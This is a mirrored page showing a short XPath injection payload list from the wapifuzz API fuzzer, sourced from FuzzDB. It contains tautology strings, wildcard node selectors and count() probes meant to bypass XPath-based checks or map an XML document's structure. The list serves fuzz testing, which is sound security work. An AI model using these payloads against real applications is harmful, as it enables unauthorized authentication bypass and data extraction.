mirror of
https://github.com/ysoftdevs/wapifuzz.git
synced 2026-01-14 23:53:30 +01:00
16 lines
331 B
Plaintext
16 lines
331 B
Plaintext
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xpath/xpath-injection.txt)
|
|
|
|
' or '1'='1
|
|
' or ''='
|
|
x' or 1=1 or 'x'='y
|
|
/
|
|
//
|
|
//*
|
|
*/*
|
|
@*
|
|
count(/child::node())
|
|
x' or name()='username' or 'x'='y
|
|
' and count(/*)=1 and '1'='1
|
|
' and count(/@*)=1 and '1'='1
|
|
' and count(/comment())=1 and '1'='1
|